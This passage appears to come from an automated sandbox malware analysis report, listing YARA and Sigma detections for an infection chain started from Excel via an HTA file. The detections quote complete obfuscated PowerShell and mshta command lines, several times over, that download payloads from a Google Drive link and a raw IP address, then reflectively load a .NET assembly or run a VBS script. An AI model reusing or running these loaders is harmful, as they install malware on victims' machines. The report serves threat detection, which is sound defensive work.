        • 0x1c67:$b3: ::UTF8.GetString(
        • 0xf1a2:$b3: ::UTF8.GetString(
        • 0x2623c:$b3: ::UTF8.GetString(
        • 0x2f58a:$b3: ::UTF8.GetString(
        • 0x401b1:$b3: ::UTF8.GetString(
        Process Memory Space: powershell.exe PID: 3588JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          Process Memory Space: powershell.exe PID: 3588INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0xf19:$b2: ::FromBase64String(
          • 0x1563:$b2: ::FromBase64String(
          • 0x1f2ca:$b2: ::FromBase64String(
          • 0x20177:$b2: ::FromBase64String(
          • 0x2192c:$b2: ::FromBase64String(
          • 0x38c2e:$b2: ::FromBase64String(
          • 0x39396:$b2: ::FromBase64String(
          • 0x399eb:$b2: ::FromBase64String(
          • 0x3fe9d:$b2: ::FromBase64String(
          • 0x404e7:$b2: ::FromBase64String(
          • 0x414c9:$b2: ::FromBase64String(
          • 0x45ff6:$b2: ::FromBase64String(
          • 0x4ef87:$b2: ::FromBase64String(
          • 0x5c6d2:$b2: ::FromBase64String(
          • 0x5ccea:$b2: ::FromBase64String(
          • 0xcca:$b3: ::UTF8.GetString(
          • 0x1314:$b3: ::UTF8.GetString(
          • 0x1eff9:$b3: ::UTF8.GetString(
          • 0x1ff40:$b3: ::UTF8.GetString(
          • 0x21733:$b3: ::UTF8.GetString(
          • 0x389df:$b3: ::UTF8.GetString(

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Base64 Encoded PowerShell Command Detected
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0Jysn
          Sigma detected: File With Uncommon Extension Created By An Office Application
          Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3268, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greatthingswithmegood[1].hta
          Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
          Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowse
          Sigma detected: Potential PowerShell Command Line Obfuscation
          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowse
          Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowse
          Sigma detected: Potentially Suspicious PowerShell Child Processes
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3656, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs" , ProcessId: 3956, ProcessName: wscript.exe
          Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0Jysn
          Sigma detected: Suspicious MSHTA Child Process
          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgI